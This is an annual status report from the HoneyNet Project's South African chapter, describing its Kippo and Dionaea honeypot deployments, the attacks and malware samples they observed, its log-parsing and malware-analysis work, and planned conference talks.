As we are a new chapter in the HoneyNet Project, there have been no changes to the organizational structure. Barry and I are working on expanding the network within South Africa in an attempt to gain more sensor nodes and hopefully track attacks over a larger area within the country.
Barry Irwin provides hosting, advice and a lot of IP space within South Africa.
The following have been deployed within South African IP space
The primary kippo honeypot has seen a little interest from over seas attackers although very little attacks seem to be originating from within South Africa. This could be due to the IP space the honey pot is sitting in, although this is mostly speculation. The honeypot has had the following pieces of malware dropped and used:
Matt plans on writing a detailed report on each as soon as time permits.
On the Dionaea honeypot there has been little change in attacks. Conficker attacks (ms08-067) still feature very highly. However on the 14th of April there was a rather large attack against MSSQL from 184.108.40.206. I have yet to decyper the content and context of the attack but there were 7868 different attacks against the MSSQL service.
RESEARCH AND DEVELOPMENT
Matt is hoping to write some code to parse Kippo log files. The premise behind the tool will be parse the log files for attacking IP addresses, successful and failed logins and any malware that may have been dropped.
Matt also wrote a very simple python script to parse GlastopfNG logs from sqlite databases. The script allows for searching of URLs and IP addresses within the database.
There seems to be very little SSH activity coming to the honeypots within South Africa. While there are many brute force attempts that prove successful, there are very few “returns” or actual login activity. At most the attackers will login, run “w” or “uptime” and then log off. I’d like to experiment a little more with Kippo and see if there is something that could be tipping off attackers to the presence of a honeypot.
The Dionaea pot has seen a few attacks other than the usual MSSQL/SMB/08-067 attacks. Of the 125 submissions, there have been 24 unique samples from 46 unique source IP addresses.
The main featuring malware seems to be “bb6.jpg” (ebbfa21230fdda9eccf16ae4295534d3) which originates from 220.127.116.11.
Information gathering on attacker IP addresses etc. is done using Maltego CE. We are currently working on getting a licensed copy of Maltego from Paterva who have graciously offered to assist us. Until such time as we have a licensed copy, we will be unable to publish any of this information as the CE edition doesn’t allow for exporting of graphs.
Malware analysis done by Matt Erasmus is a combination of static and dynamic analysis. This is done using various tools and processes on a Windows XP virtual machine running in Vmware Fusion.
Some of the tools used during static analysis include:
El Jefe has been reviewed but didn’t produce output that was useful for reporting purposes.
Most analysis and tracking is working well. Time is the biggest issue that hampers research and investigation. The areas where improvement is needed is probably around attack tracking and correlation.
PAPERS AND PRESENTATIONS
Matt is working on a presentation for ZaCon http://zacon.org.za, which will happen in October. There will also be presentations made at ISSA and BSidesCapeTown when the conferences happen. More information on these presentations will be announced as and when they are ready for public consumption.
The main area of improvement would be to widen the area of tracking within South Africa. We have spoken to interested parties and will continue to attempt to grow the network and awareness of the HoneyNet Project within South Africa.
While we are a new chapter, there is a lot to do and a lot of support to build. It’s going to be a very good year for the South African Chapter.